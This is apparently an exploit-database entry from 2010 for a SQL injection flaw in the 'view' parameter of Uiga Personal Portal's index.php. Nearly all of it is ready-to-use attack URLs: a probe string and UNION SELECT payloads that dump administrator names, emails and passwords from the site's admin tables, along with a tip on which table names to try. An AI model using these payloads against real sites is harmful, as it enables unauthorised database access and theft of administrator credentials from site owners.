Uiga Personal Portal index.php (view) SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Uiga Personal Portal index.php (view) SQL Injection
# Published : 2010-04-26
# Author : 41.w4r10r
# Previous Title : Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability
# Next Title : Joomla Component com_joomradio SQL injection vulnerability

# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :
# Code :



Exploited Link :

http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'

Examples :

http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr

oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--

http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema

il,0x3a,admin_password),8,9,10,11+from+tbl_admin--

Important: Sometimes the table name is administrators and sometimes its
admin